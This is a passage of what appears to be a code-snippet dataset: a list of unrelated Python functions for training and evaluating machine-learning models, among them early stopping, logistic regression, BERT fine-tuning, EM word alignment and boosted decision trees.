\n best_val_perf = 0\n test_perf = 0 \n patience = 5\n drops = 0\n prev_val_perf = 0 \n for epoch in xrange(epochs):\n start_time = time.time()\n # FIXME: should permute whole set rather than minibatch indexes\n if shuffle_batch:\n for minibatch_index in np.random.permutation(range(n_train_batches)):\n cost_epoch = train_model(minibatch_index)\n self.set_zero(self.zero_vec) # CHECKME: Why?\n else:\n for minibatch_index in xrange(n_train_batches):\n cost_epoch = train_model(minibatch_index) \n self.set_zero(self.zero_vec)\n train_losses = [train_error(i) for i in xrange(n_train_batches)]\n train_perf = 1 - np.mean(train_losses)\n val_losses = [val_model(i) for i in xrange(n_val_batches)]\n val_perf = 1 - np.mean(val_losses) \n info = 'epoch: %i\\%i (%.2f secs) train acc: %.2f %% | val acc: %.2f %%' % (\n epoch,epochs, time.time()-start_time, train_perf * 100., val_perf*100.) \n # from ipdb import set_trace; set_trace()\n if val_perf > prev_val_perf: \n drops=0\n if val_perf >= best_val_perf:\n best_val_perf = val_perf\n info+= \" **\"\n if model:\n # print \"save model\"\n self.save(model)\n if self.Users is not None:\n test_loss = test_model(test_set_x, test_set_u, test_set_y)\n else:\n test_loss = test_model(test_set_x, test_set_y)\n test_perf = 1 - test_loss \n else: \n drops+=1\n if drops >= patience:\n print \"Ran out of patience...\"\n break\n prev_val_perf = val_perf\n print info\n # set_trace() \n return test_perf", "def test_generate_nb(self):\n pass", "def binlogreg_train(X, Y_):\n N = X.shape[0]\n\n w = np.random.randn(X.shape[1], 1) # D x 1\n b = np.random.randn(N, 1) # N x 1\n\n for i in range(PARAM_NITER+1):\n # klasifikacijski rezultati\n scores = np.dot(X, w) + b # N x 1\n\n # vjerojatnosti razreda c_1\n probs = sigmoid(scores, y=1) # N x 1\n\n # gubitak\n loss = -1 * float(np.dot(Y_.T, np.log(probs))) # scalar\n\n # dijagnostički ispis\n if i % 10 == 0:\n print(\"iteration {}: loss {}\".format(i, loss))\n\n # if i % 1000 == 0:\n # Y = np.around(probs, decimals=0)\n # decfun = binlogreg_decfun(w, b)\n # bbox = (np.min(X, axis=0), np.max(X, axis=0))\n # data.graph_surface(decfun, bbox, offset=0.5)\n # data.graph_data(X, Y_, Y)\n\n # derivacije gubitka po klasifikacijskom rezultatu\n dL_dscores = np.subtract(probs, Y_) # N x 1\n\n # gradijenti parametara\n grad_w = np.divide(np.dot(X.T, dL_dscores), N) # D x 1\n grad_b = np.divide(np.sum(dL_dscores), N) # 1 x 1\n\n # poboljšani parametri\n w += -PARAM_DELTA * grad_w\n b += -PARAM_DELTA * grad_b\n\n return w, b", "def retr_metr(gdat, indxvaluthis=None, strgvarbthis=None):\n\n metr = np.zeros((gdat.numbepoc, 2, 3 )) - 1\n\n loss = np.empty(gdat.numbepoc)\n numbepocchec = 5\n \n print gdat.modl.summary()\n for y in gdat.indxepoc:\n print 'Training epoch %d...' 
% y\n histinpt = gdat.inpttran[:, :, None]\n hist = gdat.modl.fit(histinpt, gdat.outptran, epochs=1, batch_size=gdat.numbdatabtch, verbose=1)\n loss[y] = hist.history['loss'][0]\n indxepocloww = max(0, y - numbepocchec)\n \n for layr in gdat.modl.layers:\n func = keras.backend.function([gdat.modl.input, keras.backend.learning_phase()], [layr.output])\n \n listweigbias = layr.get_weights()\n #assert len(listweigbias) == 2\n print 'listweigbias'\n for n in range(len(listweigbias)):\n print 'n'\n print n\n print 'listweigbias[n]'\n summgene(listweigbias[n])\n stat = func([histinpt, 1.])\n print 'type(stat)'\n print type(stat)\n print 'len(stat)'\n print len(stat)\n for n in range(len(stat)):\n print 'stat[n]'\n summgene(stat[n])\n print\n print\n\n\n if y == gdat.numbepoc - 1 and 100. * (loss[indxepocloww] - loss[y]):\n print 'Warning! The optimizer may not have converged.'\n print 'loss[indxepocloww]\\n', loss[indxepocloww], '\\nloss[y]\\n', loss[y], '\\nloss\\n', loss\n\n for r in gdat.indxrtyp:\n if r == 0:\n inpt = gdat.inpttran\n outp = gdat.outptran\n numdatatemp = gdat.numbdatatran\n else:\n inpt = gdat.inpttest\n outp = gdat.outptest\n numbdatatemp = gdat.numbdatatest\n inpt = inpt[:, :, None]\n \n outppredsigm = gdat.modl.predict(inpt)\n outppred = (outppredsigm > 0.5).astype(int)\n matrconf = confusion_matrix(outp, outppred)\n if matrconf.size == 1:\n matrconftemp = np.copy(matrconf)\n matrconf = np.empty((2, 2))\n matrconf[0, 0] = matrconftemp\n trne = matrconf[0, 0]\n flpo = matrconf[0, 1]\n flne = matrconf[1, 0]\n trpo = matrconf[1, 1]\n \n if float(trpo + flpo) > 0:\n metr[y, r, 0] = trpo / float(trpo + flpo) # precision\n else:\n pass\n #print ('No positive found...')\n #raise Exception('')\n metr[y, r, 1] = float(trpo + trne) / (trpo + flpo + trne + flne) # accuracy\n if float(trpo + flne) > 0:\n metr[y, r, 2] = trpo / float(trpo + flne) # recall\n else:\n print 'No relevant sample!'\n #raise Exception('')\n \n print 'metr[y, r, :]'\n print metr[y, r, :]\n print \n return metr", "def SP_init(train_data, test_data, n_cols, n_proxim_con, perm_thresh, perm_inc, perm_dec, min_overlap, n_winners, beta_boost, T_boost_speed, verbose, pixel_size):\n\n if(pixel_size == None):\n pixel_size = 28\n\n # Load MNIST data input_size (aka nn) of 256 or 1024\n input_size = len(train_data[1])\n # print(len(train_data[1]))\n\n # Initialize synapses and permanence arrays\n syn_index = np.random.randint(0, input_size, (n_cols, n_proxim_con))\n syn_array = np.zeros((n_cols, input_size), dtype=int)\n # syn_array[syn_index] = 1\n\n # Synapses array\n for i in range(n_cols):\n syn_array[i, syn_index[i]] = 1\n\n # syn_array = np.random.randint(0, 2, (n_cols, input_size))\n perm_array = np.random.uniform(0, 1, (n_cols, input_size))\n perm_array = syn_array * perm_array\n\n # Initialize empty SDR array\n # overlap_scores = np.zeros([1, n_cols])\n sdr_train_array = np.zeros((len(train_data), n_cols), dtype=int)\n sdr_test_array = np.zeros((len(test_data), n_cols), dtype=int)\n\n # Initialize empty boosting arrays; time-averaged activation level\n time_avg_act = np.zeros([1, n_cols])\n prev_time_avg_act = np.zeros([1, n_cols])\n boosting = np.ones([1, n_cols])\n\n # Initialize metric arrays\n sparse_train_array = np.zeros(([len(train_data), 1]))\n sparse_test_array = np.zeros(([len(test_data), 1]))\n\n # Main code\n train_en = True\n for epoch in range(0, 2):\n input_set = train_data\n if train_en == False:\n input_set = test_data\n\n for iter in range(0, len(input_set)):\n # Calculate overlap scores\n 
overlap_scores = np.dot((syn_array * (perm_array >= perm_thresh)), input_set[iter, :].transpose()) \\\n * boosting\n\n # Initialize SDR (activations of cols)\n sdr = np.zeros(([1, n_cols]), dtype=int)\n\n # Select the winners\n for i in range(n_winners):\n win_val = np.max(overlap_scores)\n win_index = np.argmax(overlap_scores)\n if(win_val >= min_overlap):\n sdr[0, win_index] = 1\n overlap_scores[0, win_index] = 0\n\n #num_wins = sum(sdr)\n #print('This is num_wins')\n #print(num_wins)\n\n # Calculating activation level current and then previous, a_bar(t) and a_bar(t-1)\n if iter >= T_boost_speed:\n time_avg_act = ((T_boost_speed - 1) * prev_time_avg_act + sdr) / T_boost_speed\n prev_time_avg_act = time_avg_act\n\n # Calculating mini column neighborhood\n recent_act = (1/abs(n_cols)) * np.sum(time_avg_act)\n\n # Calculate boosting for next time\n boosting = np.exp(-beta_boost * (time_avg_act - recent_act))\n\n if(train_en == True):\n # Update permanence values for learning -> Hebbian learning\n z = sdr.transpose() * syn_array\n polar_input = np.copy(input_set[iter, :])\n polar_input[polar_input == 1] = perm_inc\n polar_input[polar_input == 0] = perm_dec\n delta_perm = polar_input * z\n perm_array = perm_array + delta_perm\n perm_array[perm_array > 1] = 1\n perm_array[perm_array < 0] = 0\n\n # Add SDR to array and calculate metrics\n # Metrics include: sparseness\n if train_en == False:\n sdr_test_array[iter, :] = sdr\n sparse_test_array[iter, 0] = sparseness(n_cols, sdr)\n else:\n sdr_train_array[iter, :] = sdr\n sparse_train_array[iter, 0] = sparseness(n_cols, sdr)\n\n # You are set!!!\n\n if(verbose):\n pixel_sdr = int(n_cols**(0.5))\n # Plot the image\n sdr_image = np.reshape(sdr, (pixel_sdr, pixel_sdr))\n\n # Plot the image\n image = np.reshape(train_data[iter, :], (pixel_size, pixel_size))\n plt.figure(1)\n plt.subplot(211)\n plt.imshow(image, cmap='gray_r')\n plt.title('Train')\n\n # Plot the sdr\n plt.subplot(212)\n plt.imshow(sdr_image, cmap='gray_r')\n plt.title('SDR')\n plt.tight_layout()\n plt.show()\n if(iter % 10 == 0):\n print(iter)\n\n train_en = False\n return sdr_train_array, sdr_test_array, sparse_train_array, sparse_test_array", "def calculate_training_loss(self):\n self.network.train()\n self.training_average_loss = self.calculate_average_loss(self.training_dataloader)", "def trainNet():", "def train(self, X, y, batch_size=5, num_epochs=10, alpha=0.1, gamma=0.9, learning=\"Delta\"):\n rem = int(np.ceil(len(X[0])/batch_size))\n for epoch in range(num_epochs):\n art = 0;\n for sample in range(rem):\n end = art + batch_size\n\n # Get a sample (column from X and Y) where the size of the sample is given by the batch size\n sampleX = X[:, art : end]\n sampleY = y[:, art : end]\n #print (sampleX)\n\n # Get the prediction\n results = self.predict(sampleX)\n art += batch_size\n\n if learning == \"Delta\" or learning == \"delta\":\n # Calculate e\n e = np.subtract(sampleY, results)\n\n # Calculate e dot p, where p is the input matrix\n ep = np.dot(e, np.transpose(sampleX))\n\n # Multiply this new matrix by the scalar alpha\n aep = np.multiply(alpha, ep)\n\n # Calculate the new weights along with the bias\n self.weights = np.add(self.weights, aep)\n \n elif learning == \"Filtered\" or learning == \"filtered\":\n\n # Calculate e dot p, where p is the input matrix\n ep = np.dot(sampleY, np.transpose(sampleX))\n\n # Multiply this new matrix by the scalar alpha\n aep = np.multiply(alpha, ep)\n\n # Multiply the old weights by some scalar gamma\n gw = np.multiply(1 - gamma, 
self.weights)\n\n self.weights = np.add(gw, aep)\n\n elif learning == \"Unsupervised_hebb\" or learning == \"unsupervised_hebb\":\n # Add a row of one's to the top of the input matrix\n #newX = np.vstack((np.array([1 for column in range(sampleX.shape[1])]), sampleX))\n\n # Calculate e dot p, where p is the input matrix\n ep = np.dot(results, np.transpose(sampleX))\n\n # Multiply this new matrix by the scalar alpha\n aep = np.multiply(alpha, ep)\n\n # Calculate the new weights along with the bias\n self.weights = np.add(self.weights, aep)", "def fit(self):\n for i in range(self.current_epoch, self.max_epoch):\n self.current_epoch += 1\n # train\n train_dataloader = self.data_module.get_train_dataloader(\n batch_size=self.train_batch_size, \n shuffle=self.train_dataloader_shuffle, \n num_workers=self.dataloader_num_workers,\n pin_memory=True\n )\n neptune.log_metric(\"learning_rate_vs_epoch\", self.optimizer.param_groups[0]['lr'])\n self.train_one_epoch(train_dataloader)\n\n # validate \n if self.validate_after == 'epoch' and self.train_on_all_data == False and self.run_lr_range_test == False:\n validation_dataloader = self.data_module.get_valid_dataloader(\n batch_size=self.valid_batch_size, \n shuffle=self.train_dataloader_shuffle, \n num_workers=self.dataloader_num_workers, \n pin_memory=True\n )\n self.validate_one_epoch(validation_dataloader)\n\n if self.scheduler:\n if self.step_scheduler_after == 'epoch': \n if self.step_scheduler_metric == 'val_auc':\n self.scheduler.step(self.metrics['valid'][-1]['auc_score'])\n else:\n self.scheduler.step()\n\n if self.run_lr_range_test:\n neptune.log_metric('validation_epoch_end_AUC_vs_LR', \n self.scheduler.get_last_lr()[0], y=self.metrics['valid'][-1]['auc_score'])\n\n # checkpoint model for resuming model\n if (self.current_epoch % self.checkpoint_epochs) == 0:\n self.save_checkpoint()\n\n # sleep the training process\n if self.current_epoch % self.sleep_in_epochs == 0:\n print(f\"SLEEPING FOR {self.sleep_time} at epoch={self.current_epoch}\")\n for i in range(int(self.sleep_time/30)):\n time.sleep(i)\n neptune.log_metric(\"sleeping_status\", y=1)\n\n stop_training = self.stopping_criteria()\n if stop_training:\n if self.fp16:\n self.scaler.step(self.optimizer)\n self.scaler.update()\n self.optimizer.zero_grad()\n else:\n self.optimizer.step()\n self.optimizer.zero_grad()\n # backward all the accumulate gradients\n print(f\"stopped training at {self.current_epoch} epoch\")\n break", "def performance(stats):\n\n def fbeta_score(precision, recall, beta=1.0):\n beta_square = beta * beta\n if (precision != 0.0) and (recall != 0.0):\n res = ((1 + beta_square) * precision * recall / (beta_square * precision + recall))\n else:\n res = 0.0\n return res\n\n def prf1(tp_, fp_, fn_, tn_):\n # 单类的\n tp_ = np.sum(tp_, axis=0) #batch*=》\n fp_ = np.sum(fp_, axis=0)\n fn_ = np.sum(fn_, axis=0)\n tn_ = np.sum(tn_, axis=0)\n # 总体的\n atp = np.sum(tp_)\n afp = np.sum(fp_)\n afn = np.sum(fn_)\n atn = np.sum(tn_)\n\n micro_p = (1.0 * atp) / (atp + afp) if (atp + afp != 0) else 0.0\n micro_r = (1.0 * atp) / (atp + afn) if (atp + afn != 0) else 0.0\n micro_f = fbeta_score(micro_p, micro_r)\n\n pp = [0]\n rr = [0]\n ff = [0]\n macro_p = np.mean(pp)\n macro_r = np.mean(rr)\n macro_f = np.mean(ff)\n\n acc = (atp + atn) / (atp + atn + afp + afn) if (atp + atn + afp + afn) else 0.0\n acc_NA = atn / (atn + afp) if (atn + afp) else 0.0\n acc_not_NA = atp / (atp + afn) if (atp + afn) else 0.0\n return {'acc': acc, 'NA_acc': acc_NA, 'not_NA_acc': acc_not_NA,\n 'micro_p': 
micro_p, 'micro_r': micro_r, 'micro_f': micro_f,\n 'macro_p': macro_p, 'macro_r': macro_r, 'macro_f': macro_f,\n 'tp': atp, 'true': atp + afn, 'pred': atp + afp, 'total': (atp + atn + afp + afn)}\n\n fin_loss = sum(stats['loss']) / len(stats['loss'])\n scores = prf1(stats['tp'], stats['fp'], stats['fn'], stats['tn'])\n return fin_loss, scores", "def finetune_learningrate_createData():\n acc,auc = [],[]\n for i in tqdm([j*0.005 for j in range(1,31)],desc='Progress(max_depth)',ncols=70,smoothing=0.5):\n X_train, X_test, y_train, y_test, X, y_binary = initializing()\n XGBCla = get_XGBmodel(lr=i)\n XGBCla = XGBCla.fit(X_train, y_train)\n acc.append(accuracy_score(XGBCla.predict(X_test),y_test))\n auc.append(roc_auc_score(XGBCla.predict(X_test),y_test))\n np.save(\"npy-data/result_learningrate_tuning_acc_auc_crossval_train\",acc+auc)", "def test_bayes_updates_good_data(self):\r\n # result for first -> fourth calculated by hand\r\n for obs, exp in zip(bayes_updates(self.test), self.result):\r\n self.assertFloatEqualAbs(obs, exp, 1e-11)", "def train_and_evaluate(OUTPUT_DIR,do_train = True,do_eval=True):\n\n\t\n\tBATCH_SIZE = 32\n\tLEARNING_RATE = 2e-5\n\tNUM_TRAIN_EPOCHS = 5.0\n\n\t#in this steps lr will be low and training will be slow\n\tWARMUP_PROPORTION = 0.1\n\n\n\n\tif os.path.exists(OUTPUT_DIR) and os.listdir(OUTPUT_DIR) and do_train:\n\t\traise ValueError(\"Output directory ({}) already exists and is not empty.\".format(OUTPUT_DIR))\n\tif not os.path.exists(OUTPUT_DIR):\n\t\tos.makedirs(OUTPUT_DIR)\n\t\t\n\t#create train and test data\n\n\ttrain_sents,train_labels,test_sents,test_labels = create_train_test(\"ADE/DRUG-AE.rel\",\"ADE/negative_data_AE.rel\")\n\n\tdevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n\n\ttokenizer = BertTokenizer.from_pretrained(\"bert-base-uncased\", do_lower_case=True)\n\n\tif do_train:\n\n\t\ttrain_examples = [InputExample(guid=None,text_a=sentence,text_b=None,label=label) for sentence,label in zip(train_sents, train_labels)]\n\t\tnum_train_examples = len(train_examples)\n\n\t\tnum_train_steps = int(math.ceil(num_train_examples / BATCH_SIZE * NUM_TRAIN_EPOCHS))\n\t\tnum_warmup_steps = int(num_train_steps * WARMUP_PROPORTION)\n\n\t\tmodel = BertForSequenceClassification.from_pretrained(\"bert-base-uncased\",num_labels = num_labels)\n\t\tmodel.to(device)\n\n\t\tparam_optimizer = list(model.named_parameters())\n\t\tno_decay = ['bias', 'LayerNorm.bias', 'LayerNorm.weight']\n\t\toptimizer_grouped_parameters = [\n\t\t\t{'params': [p for n, p in param_optimizer if not any(nd in n for nd in no_decay)], 'weight_decay': 0.01},\n\t\t\t{'params': [p for n, p in param_optimizer if any(nd in n for nd in no_decay)], 'weight_decay': 0.0}\n\t\t\t]\n\n\t\toptimizer = BertAdam(optimizer_grouped_parameters,lr=LEARNING_RATE,warmup=WARMUP_PROPORTION,t_total=num_train_steps)\n\n\t\tglobal_step = 0\n\t\tnb_tr_steps = 0\n\t\ttr_loss = 0\n\n\t\ttrain_features = convert_examples_to_features(\n\t\t\ttrain_examples, label_list, MAX_SEQ_LENGTH, tokenizer)\n\n\n\t\tlogger.info(\"***** Running training *****\")\n\t\tlogger.info(\" Num examples = %d\", num_train_examples)\n\t\tlogger.info(\" Batch size = %d\", BATCH_SIZE)\n\t\tlogger.info(\" Num steps = %d\", num_train_steps)\n\n\n\t\tall_input_ids = torch.tensor([f.input_ids for f in train_features], dtype=torch.long)\n\t\tall_input_mask = torch.tensor([f.input_mask for f in train_features], dtype=torch.long)\n\t\tall_segment_ids = torch.tensor([f.segment_ids for f in train_features], 
dtype=torch.long)\n\t\tall_label_ids = torch.tensor([f.label_id for f in train_features], dtype=torch.long)\n\n\t\ttrain_data = TensorDataset(all_input_ids, all_input_mask, all_segment_ids, all_label_ids)\n\t\ttrain_sampler = RandomSampler(train_data)\n\n\t\ttrain_dataloader = DataLoader(train_data, sampler=train_sampler, batch_size=BATCH_SIZE)\n\n\t\tmodel.train()\n\t\t# for name, param in model.named_parameters():\n\t\t# if param.requires_grad:\n\t\t# print(name)\n\t\t# return\n\t\tfor _ in trange(int(NUM_TRAIN_EPOCHS), desc=\"Epoch\"):\n\t\t\ttr_loss = 0\n\t\t\tnb_tr_examples, nb_tr_steps = 0, 0\n\t\t\tfor step, batch in enumerate(tqdm(train_dataloader, desc=\"Iteration\")):\n\t\t\t\tbatch = tuple(t.to(device) for t in batch)\n\t\t\t\tinput_ids, input_mask, segment_ids, label_id = batch\n\t\t\t\tloss = model(input_ids, segment_ids, input_mask, label_id)\n\t\t\t\tloss.backward()\n\n\t\t\t\ttr_loss += loss.item()\n\t\t\t\tnb_tr_examples += input_ids.size(0)\n\t\t\t\tnb_tr_steps += 1\n\t\t\t\toptimizer.step()\n\t\t\t\toptimizer.zero_grad()\n\t\t\t\tglobal_step += 1\n\t\t\tprint(tr_loss)\n\n\t\t# Save a trained model and the associated configuration\n\t\tmodel_to_save = model.module if hasattr(model, 'module') else model # Only save the model it-self\n\t\toutput_model_file = os.path.join(OUTPUT_DIR, WEIGHTS_NAME)\n\t\ttorch.save(model_to_save.state_dict(), output_model_file)\n\t\toutput_config_file = os.path.join(OUTPUT_DIR, CONFIG_NAME)\n\t\twith open(output_config_file, 'w') as f:\n\t\t\tf.write(model_to_save.config.to_json_string())\n\t\tlabel_map = {i : label for i, label in enumerate(label_list,1)} \n\t\tmodel_config = {\"bert_model\":\"bert-base-uncased\",\"do_lower\":True,\"max_seq_length\":MAX_SEQ_LENGTH,\"num_labels\":num_labels,\"label_map\":label_map}\n\t\tjson.dump(model_config,open(os.path.join(OUTPUT_DIR,\"model_config.json\"),\"w\"))\n\n\telse:\n\t\toutput_config_file = os.path.join(OUTPUT_DIR, CONFIG_NAME)\n\t\toutput_model_file = os.path.join(OUTPUT_DIR, WEIGHTS_NAME)\n\t\tconfig = BertConfig(output_config_file)\n\t\tmodel = BertForSequenceClassification(config, num_labels=num_labels)\n\t\tmodel.load_state_dict(torch.load(output_model_file))\n\n\tmodel.to(device)\n\n\tif do_eval:\n\n\t\tEVAL_BATCH_SIZE = 32\n\n\t\teval_examples = [InputExample(guid=None,text_a=sentence,text_b=None,label=label) for sentence,label in zip(test_sents, test_labels)]\n\t\tnum_eval_examples = len(eval_examples)\n\n\t\teval_features = convert_examples_to_features(\n\t\t\teval_examples, label_list, MAX_SEQ_LENGTH, tokenizer)\n\n\t\tlogger.info(\"***** Running evaluation *****\")\n\t\tlogger.info(\" Num examples = %d\", num_eval_examples)\n\t\tlogger.info(\" Batch size = %d\", EVAL_BATCH_SIZE)\n\t\tall_input_ids = torch.tensor([f.input_ids for f in eval_features], dtype=torch.long)\n\t\tall_input_mask = torch.tensor([f.input_mask for f in eval_features], dtype=torch.long)\n\t\tall_segment_ids = torch.tensor([f.segment_ids for f in eval_features], dtype=torch.long)\n\t\tall_label_ids = torch.tensor([f.label_id for f in eval_features], dtype=torch.long)\n\t\teval_data = TensorDataset(all_input_ids, all_input_mask, all_segment_ids, all_label_ids) \n\t\t# # Run prediction for full data\n\t\teval_sampler = SequentialSampler(eval_data)\n\t\teval_dataloader = DataLoader(eval_data, sampler=eval_sampler, batch_size=EVAL_BATCH_SIZE)\n\t\tmodel.eval()\n\n\t\teval_loss, eval_accuracy = 0, 0\n\t\tnb_eval_steps, nb_eval_examples = 0, 0\n\t\ty_true = []\n\t\ty_pred = []\n\t\tlabel_map = {i : label for i, label in 
enumerate(label_list,1)}\n\t\tfor input_ids, input_mask, segment_ids, label_ids in tqdm(eval_dataloader, desc=\"Evaluating\"):\n\t\t\tinput_ids = input_ids.to(device)\n\t\t\tinput_mask = input_mask.to(device)\n\t\t\tsegment_ids = segment_ids.to(device)\n\t\t\tlabel_ids = label_ids.to(device)\n\n\t\t\twith torch.no_grad():\n\t\t\t\tlogits = model(input_ids, segment_ids, input_mask)\n\t\t\t\t\n\t\t\tlogits = torch.argmax(F.log_softmax(logits,dim=1),dim=1)\n\t\t\tlogits = logits.detach().cpu().numpy()\n\t\t\tlabel_ids = label_ids.to('cpu').numpy()\n\t\t\ty_pred.extend(logits)\n\t\t\ty_true.extend(label_ids)\n\t\tprint(len(y_pred))\n\t\tprint(len(y_true))\n\t\treport = classification_report(y_true, y_pred)\n\t\toutput_eval_file = os.path.join(OUTPUT_DIR, \"eval_results.txt\")\n\t\twith open(output_eval_file, \"w\") as writer:\n\t\t\tlogger.info(\"***** Eval results *****\")\n\t\t\tlogger.info(\"\\n%s\", report)\n\t\t\twriter.write(report)", "def train(self, n):\n t = self.t\n\n parallel_sentences = list(zip(self.target,self.source))\n\n for i in range(n):\n\n count = defaultdict(lambda:defaultdict(int))\n s_total = dict()\n total = defaultdict(int)\n\n for E,F in parallel_sentences:\n # compute normalization\n for e in E:\n t_e = t[e]\n s_total[e] = 0\n for f in F:\n s_total[e] += t_e[f]\n\n # collect counts\n for e in E:\n count_e = count[e]\n t_e = t[e]\n s_total_e = s_total[e]\n for f in F:\n tmp = t_e[f] / s_total_e\n count_e[f] += tmp\n total[f] += tmp\n\n # estimate probabilities\n for e in self.t_words:\n t_e = t[e]\n count_e = count[e]\n #for f in self.s_words:\n for f in count_e:\n #if f not in count[e]: continue\n t_e[f] = count_e[f] / total[f]", "def train(self, data_source, batch_size=4096):\n self.mean, self.std_dev = stats_batchwise(data_source, batch_size)", "def SGD(self, X_train, Y_train, X_validation, Y_validation, epochs, mini_batch_size, learning_rate, decay):\n \n training_data = zip(X_train, Y_train)\n validation_data = zip(X_validation, Y_validation)\n\n \n \"\"\"Take the training data and make a list out of it\"\"\"\n training_data = list(training_data)\n \n \"\"\"Check if there is data in the test_data\"\"\"\n if validation_data:\n validation_data = list(validation_data)\n n_validation_data = len(validation_data)\n \n \"\"\"\n Mini-batches: Each mini-batch contains mini_batch_size elements from the training set.\n \n Splits the training data into mini-bachtes, and for each mini-batches we train the network. 
\n \n \"\"\" \n\n# Updated for the testing\n# ========================\n mini_batches = []\n high_score = [0,0]\n for j in range(epochs):\n random.shuffle(training_data)\n for k in range(0, len(training_data), mini_batch_size):\n mini_batches.append(training_data[k:k+mini_batch_size])\n for mini_batch in mini_batches:\n self.update_mini_batch(mini_batch, learning_rate)\n if validation_data:\n new_score = self.evaluate(X_validation, Y_validation)\n if high_score[0] < new_score:\n high_score[0] = new_score\n high_score[1] = j + 1\n learning_rate = learning_rate * (1-decay)\n \n return high_score[0], high_score[1]\n# ========================\n\n\n \"\"\"\n Update the network's weights and biases by applying\n gradient descent using backpropagation to a single mini batch.\n The ``mini_batch`` is a list of tuples ``(x, y)``, and ``eta``\n is the learning rate.\"\"\"", "def build(self):\n # weights to apply to training samples, updated on each\n # iteration of the boosting algo, normalised to 1\n sigWeights = np.ones(self.nSig, dtype=float)\n bkgWeights = np.ones(self.nBkg, dtype=float)\n reweight = 1.0/(np.sum(sigWeights)+np.sum(bkgWeights))\n sigWeights *= reweight\n bkgWeights *= reweight \n\n # Weight of each tree, strong classifers have higher weight\n self.treeWeights = np.zeros(self.ntrees, dtype=float)\n\n for i in xrange(self.ntrees):\n\n # build new tree\n newTree = Tree()\n newTree.load(self.sigData,self.bkgData,weights=(sigWeights,bkgWeights))\n newTree.build()\n self.dTrees.append(newTree) \n\n # evaluate trees\n # keep track of each event\n err = 0.0\n sigWrong = np.zeros(self.nSig)\n bkgWrong = np.zeros(self.nBkg)\n\n for j in range(self.nSig):\n if newTree.classify(np.array((self.sigData[j,])))<0:\n sigWrong[i]=1\n err+=sigWeights[j]\n\n for j in range(self.nBkg):\n if newTree.classify(np.array((self.bkgData[j,])))>0:\n bkgWrong[i]=1\n err+=bkgWeights[j]\n\n alpha = self.beta*math.log((1.0-err)/err)\n print err,alpha\n corFactor = math.exp(-alpha)\n wrongFactor = math.exp(alpha)\n\n if (err<1e-20 or err >= 0.5):\n print \"SOEMTHING WRONG!!\"\n\n self.treeWeights[i] = alpha\n\n # reweight training samples\n for j in range(self.nSig):\n if sigWrong[j]:\n sigWeights[j]*=wrongFactor\n else :\n sigWeights[j]*=corFactor\n\n for j in range(self.nBkg):\n if bkgWrong[j]:\n bkgWeights[j]*=wrongFactor\n else :\n bkgWeights[j]*=corFactor\n\n # normalise weights\n reweight = 1.0/(np.sum(sigWeights)+np.sum(bkgWeights))\n sigWeights *= reweight\n bkgWeights *= reweight", "def _train_epoch(self, train_batches, data, max_metric_value, metric_save, patience, step_pbar):\n evaluate = True\n exit_tag = False\n num_steps = self.args.num_steps\n check_point, batch_size = self.args.check_point, self.args.batch_size\n save_dir, save_prefix = self.args.save_dir, self.args.algo\n\n for bitx, batch in enumerate(train_batches):\n if evaluate and self.global_step % self.eval_freq == 0:\n if data.dev_set is not None:\n dev_batches = data.gen_mini_batches('dev', 31928, shuffle=False)\n dev_loss, dev_perplexity, dev_perplexity_at_rank = self.evaluate(dev_batches, data)\n #print('dev loss=%s' % dev_loss, 'dev ppl=%s' % dev_perplexity, 'dev ppl at rank=', dev_perplexity_at_rank)\n\n test_batches = data.gen_mini_batches('test', 41405, shuffle=False)\n test_loss, test_perplexity, test_perplexity_at_rank = self.evaluate(test_batches, data)\n #print('test loss=%s' % test_loss, 'dev ppl=%s' % test_perplexity, 'dev ppl at rank=' , test_perplexity_at_rank)\n\n self.writer.add_scalar(\"dev/loss\", dev_loss, 
self.global_step)\n self.writer.add_scalar(\"dev/perplexity\", dev_perplexity, self.global_step)\n self.writer.add_scalar(\"test/loss\", test_loss, self.global_step)\n self.writer.add_scalar(\"test/perplexity\", test_perplexity, self.global_step)\n\n for trunc_level in self.trunc_levels:\n ndcg_version1, ndcg_version2 = self.relevance_estimator.evaluate(self, data, self.relevance_queries, trunc_level)\n self.writer.add_scalar(\"NDCG_version1/{}\".format(trunc_level), ndcg_version1, self.global_step)\n self.writer.add_scalar(\"NDCG_version2/{}\".format(trunc_level), ndcg_version2, self.global_step)\n\n if dev_loss < metric_save:\n metric_save = dev_loss\n patience = 0\n else:\n patience += 1\n # Trick: do not decay d_lr help convergence\n if patience >= self.patience:\n #self.adjust_learning_rate(self.discrim_optimizer, self.args.lr_decay)\n self.adjust_learning_rate(self.policy_optimizer, self.args.lr_decay)\n self.g_lr *= self.args.lr_decay\n #self.d_lr *= self.args.lr_decay\n self.writer.add_scalar('train/g_lr', self.g_lr, self.global_step)\n #self.writer.add_scalar('train/d_lr', self.d_lr, self.global_step)\n metric_save = dev_loss\n patience = 0\n self.patience += 1\n else:\n self.logger.warning('No dev set is loaded for evaluation in the dataset!')\n\n self.global_step += 1\n step_pbar.update(1)\n QIDS = Variable(torch.from_numpy(np.array(batch['qids'], dtype=np.int64)))\n UIDS = Variable(torch.from_numpy(np.array(batch['uids'], dtype=np.int64)))\n VIDS = Variable(torch.from_numpy(np.array(batch['vids'], dtype=np.int64)))\n PRE_CLICKS = Variable(torch.from_numpy(np.array(batch['clicks'], dtype=np.int64)[:, :-1]))\n CLICKS = Variable(torch.from_numpy(np.array(batch['clicks'], dtype=np.int64)[:, 1:]))\n\n # generate trajectories\n for __ in range(self.args.d_step):\n actor_rnn_state = Variable(torch.zeros(1, QIDS.shape[0], self.gru_hidden_size))\n critic_rnn_state = Variable(torch.zeros(1, QIDS.shape[0], self.gru_hidden_size))\n CLICK_ = torch.zeros(QIDS.shape[0], 1, dtype=CLICKS.dtype)\n logits = torch.zeros(QIDS.shape[0], 0, 2)\n values = torch.zeros(QIDS.shape[0], 0)\n CLICKS_ = Variable(torch.zeros((QIDS.shape[0], 0), dtype=CLICKS.dtype))\n if self.use_cuda:\n QIDS, UIDS, VIDS, PRE_CLICKS, CLICKS = QIDS.cuda(), UIDS.cuda(), VIDS.cuda(), PRE_CLICKS.cuda(), CLICKS.cuda()\n actor_rnn_state, critic_rnn_state, CLICK_ = actor_rnn_state.cuda(), critic_rnn_state.cuda(), CLICK_.cuda()\n logits, values, CLICKS_ = logits.cuda(), values.cuda(), CLICKS_.cuda()\n self.policy.eval()\n for i in range(self.max_d_num + 1):\n logit, value, actor_rnn_state, critic_rnn_state = self.policy(QIDS[:, i:i+1], \n UIDS[:, i:i+1], \n VIDS[:, i:i+1], \n CLICK_, \n actor_rnn_state, \n critic_rnn_state)\n if 